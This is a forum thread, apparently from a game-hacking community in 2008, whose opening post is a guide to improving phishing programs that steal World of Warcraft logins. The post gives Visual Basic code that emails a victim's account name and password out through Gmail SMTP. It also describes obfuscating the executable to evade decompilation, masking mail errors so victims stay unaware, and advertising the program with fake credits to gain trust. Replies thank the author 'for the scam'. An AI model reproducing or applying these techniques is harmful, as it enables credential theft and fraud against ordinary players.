[GUIDE] Improving Phishing Programs menu
100% Up to 1000$
4.9/5
150% Up to 200$ & 20 Freespins
4.8/5
Up to 1 BTC
4.9/5
20% Cashback
4.8/5
Up to 5 BTC
4.8/5
100% Up to 1 BTC
4.7/5
Up to 5 BTC
4.7/5
110% Up to 1 BTC
4.6/5

User Tag List

Page 1 of 2 12 LastLast
Results 1 to 15 of 21
  1. #1
    Y R U A NUB ?'s Avatar Banned
    Reputation
    103
    Join Date
    Nov 2007
    Posts
    436
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    [GUIDE] Improving Phishing Programs [Making Un-Decompilable & Other Stuff]

    [GUIDE] Improving Phishing Programs
    Well, to start I've seen the forums get really FLOODED with these scamming programs of all kinds. Zeroi9 has been a really awesome contributor when it comes to this kind of scams. (I taught him Visual Basic by the way, and made a bunch of stuff for his programs, I don't really mind getting no credits since I'm not active but yeah). Anyway, I was going to go through a few things here since I know for a fact that these programs won't die... :yuck:

    - Obfuscating your programs (making them "un-decompilable")
    - Improving your programs and making them look legit
    - Advertising
    - Last words

    Let's get this started.

    [PART #1 - Obfuscating]
    A few weeks ago I was browsing through MMOwned, and Youtube to find some of the most common scamming programs & guides. I saw about 4 Visual Basic project files that was shared with people so that they could create their own programs. What I noticed was.. they're not obfuscated :O! So, what I did was using a program, I won't tell you what program because that would create pure chaos, and I obtained the login details of numerous of programs. It's like scamming a scammer, how cool is that. Lol, just kidding. I'll help you prevent this. What you do is, download .NET reactor on www.EZIRIZ.com ...To Be One Step Ahead. It's trial, and shows a little box before opening the program when it's finished. (Might wanna find a serial or something, but warez is not allowed here) However, it's protection at it's best :P

    Open up your .NET reactor, and you will see:



    Now, this is quite simple. Press "open" on main assembly, and open up your scamming program .exe file. On the "quick settings", tick:

    Application
    Necrobit
    Obfuscation

    Now that's done. Alright, now to save this. Press "Protect" at the right side of your .NET reactor. Wait for it to load, and then a new folder will appear in the scamming programs folder, and in that folder, *deep breath*, the secured (obfuscated) program has appeared. It's un-decompilable. Have fun.

    [PART #2 - Improving]
    From what I've seen, some programs have a pretty lame design, doesn't look legit or professional at all, and the mail body is very very messy. As for the mail body, use the
    vbCrLf
    function between each piece of account information. Example:

    Code:
    mail.Body = "Account Name:" + TextBox1.Text + vbCrLf + "Password:" + vbCrLf + TextBox2.Text
    So what's the purpose of this? Well the, "vbCrLf" function jumps down a line, which does:

    Account Name:
    Password:
    Instead of,

    Account Name: Password:
    Doesn't that make stuff much more simple? Now for some design and other improvement.

    What would happen if G-Mail had problems with their SMTP? Well, you would run on an exception, and it would probably end up that the victim would get to know that it's a scam. How do we prevent it? Like this:

    Here's the common mail code people use.
    Code:
        Dim mail As New System.Net.Mail.MailMessage()
                    Dim SmtpServer As New SmtpClient
                    SmtpServer.Credentials = New Net.NetworkCredential("", "")
                    SmtpServer.Port = 587
                    SmtpServer.Host = "smtp.gmail.com"
                    SmtpServer.EnableSsl = True
                    mail.To.Add("")
                    mail.From = 
                    mail.Subject = 
                    mail.Body = 
                    SmtpServer.Send(mail)
    Now, what we want to do is to do something else than output an error message if it runs on an exception. Do this:

    Code:
     
       Try
        Dim mail As New System.Net.Mail.MailMessage()
                    Dim SmtpServer As New SmtpClient
                    SmtpServer.Credentials = New Net.NetworkCredential("", "")
                    SmtpServer.Port = 587
                    SmtpServer.Host = "smtp.gmail.com"
                    SmtpServer.EnableSsl = True
                    mail.To.Add("")
                    mail.From = 
                    mail.Subject = 
                    mail.Body = 
                    SmtpServer.Send(mail)
    Catch exception As Exception
                    MsgBox("Something went wrong. Please try again a little later.")
                End Try
    Now, if the SMTP isn't working (or can also be caused by wrong e-mail details), it will just show a message box that says "Something went wrong. Please try again a little later." You can edit the message to what pleases you, and even do another function such as "Me.Close()" which closes the program, but this works just fine.

    As for form design, I will show a real bad example. This is the "Instant 80 Multi-Suite Hack... scam".



    Is it just me, or does it look really poor? Yes it does. This is actually how it looks when you start the program. It has a plain black background, and then some sheet on it. We still can make it look decent. Go to the form settings, then "Back Color", press the "Web" tab, and choose transparent. The result would be:



    Looks better, doesn't it? Alright, there's a bunch of other ugly things I could mention, but since design doesn't really has to do with scamming, I won't go through that much.


    [PART #3 - Advertising]
    Now that we've got a decent program, it's time to spread your program. Be professional and legit. Make yourself a Youtube video. Go to all WoW communities you can find (well not MMOwned), and spread the word.
    Also a few tips are to make it seem like a lot of work is put into this hack. Write like really geeky things, and the victims won't really understand and go "well, they know best". Things such as:

    Credits for CaRtW0man34 for the algorithms, and ElKo for hosting the reverser engine.
    Just builds up the trust a little, if you know what I mean.

    [Last Words]
    If you want me to help you, or even make programs for you, add me on "[email protected]", and offer me something in return.
    Oh, and people, you don't have to use gmail, you just need the smtp for any mail service and you can use that too. Don't confuse yourself over this.

    GLHF. Rep and comments - Massivly appreciated

    Last edited by Y R U A NUB ?; 12-31-2008 at 07:44 AM.

    [GUIDE] Improving Phishing Programs
  2. #2
    Y R U A NUB ?'s Avatar Banned
    Reputation
    103
    Join Date
    Nov 2007
    Posts
    436
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I'm disappointed. No replies...

  3. #3
    Jon Lajoie's Avatar Banned
    Reputation
    105
    Join Date
    Jul 2008
    Posts
    765
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    it takes a while nowadays for em to come in...anyways....good guide. , +rep from to to you for evah
    edit:shouldnt this be in guides

  4. #4
    Y R U A NUB ?'s Avatar Banned
    Reputation
    103
    Join Date
    Nov 2007
    Posts
    436
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by purenoob134 View Post
    it takes a while nowadays for em to come in...anyways....good guide. , +rep from to to you for evah
    edit:shouldnt this be in guides
    Thanks for rep. Uhmm.. don't know about the sections, but personally I think it fits quite fine here :P

  5. #5
    Y R U A NUB ?'s Avatar Banned
    Reputation
    103
    Join Date
    Nov 2007
    Posts
    436
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    wtfb00mp

  6. #6
    Y R U A NUB ?'s Avatar Banned
    Reputation
    103
    Join Date
    Nov 2007
    Posts
    436
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Seriously.... I put effort into this, people view it but don't even leave a comment nowadays. I'm sure this is helpful for people, but errr, they ignore it.

  7. #7
    wowmania's Avatar Active Member
    Reputation
    31
    Join Date
    Jun 2008
    Posts
    117
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thank you for the undecompilable trick +rep

  8. #8
    Y R U A NUB ?'s Avatar Banned
    Reputation
    103
    Join Date
    Nov 2007
    Posts
    436
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by wowmania View Post
    Thank you for the undecompilable trick +rep
    Lmao, thanks for reply and rep (even tho I haven't got any yet xD) <33 Hope it helps.

  9. #9
    Imbahamut's Avatar Active Member
    Reputation
    25
    Join Date
    Mar 2008
    Posts
    74
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Well written, the bit about obusfacting was quite interesenting -> +rep

  10. #10
    Y R U A NUB ?'s Avatar Banned
    Reputation
    103
    Join Date
    Nov 2007
    Posts
    436
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Imbahamut View Post
    Well written, the bit about obusfacting was quite interesenting -> +rep
    Thanks a bunch. Yeah, trust me, it's really helpful. So far I've managed to de-compile a lot of programs that didn't come from Zeroi9, as he obfuscated his programs.. yeah. Just a headsup to everyone.

  11. #11
    samuel93's Avatar Member
    Reputation
    59
    Join Date
    Sep 2008
    Posts
    400
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    +Rep for effort but im so crap on Pc's i couldnt phish to save my life
    WTT wtlk acc, 70 ele shammie/ 19 epic huntard x2 39 good geared twinks for goldies on trollbane, know all info + SQ/A an can change acc to ur email it a EU acc an perfect for scamming. priv message me. :wave:

  12. #12
    Exp's Avatar Member
    Reputation
    9
    Join Date
    Dec 2008
    Posts
    51
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    U R OP ;D great guide

  13. #13
    Y R U A NUB ?'s Avatar Banned
    Reputation
    103
    Join Date
    Nov 2007
    Posts
    436
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thanks guys Hope it helps.

  14. #14
    maxiboy's Avatar Member
    Reputation
    14
    Join Date
    Sep 2007
    Posts
    69
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thanks for the scam man

  15. #15
    Y R U A NUB ?'s Avatar Banned
    Reputation
    103
    Join Date
    Nov 2007
    Posts
    436
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by maxiboy View Post
    Thanks for the scam man
    Niema problemzka

Page 1 of 2 12 LastLast

Similar Threads

  1. DVD Burning Guide! 100% Free Programs
    By Nosferattu in forum Community Chat
    Replies: 4
    Last Post: 11-04-2007, 12:56 PM
  2. Guide to needed programs
    By pwner in forum World of Warcraft Guides
    Replies: 8
    Last Post: 07-07-2006, 10:17 AM
All times are GMT -5. The time now is 05:48 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search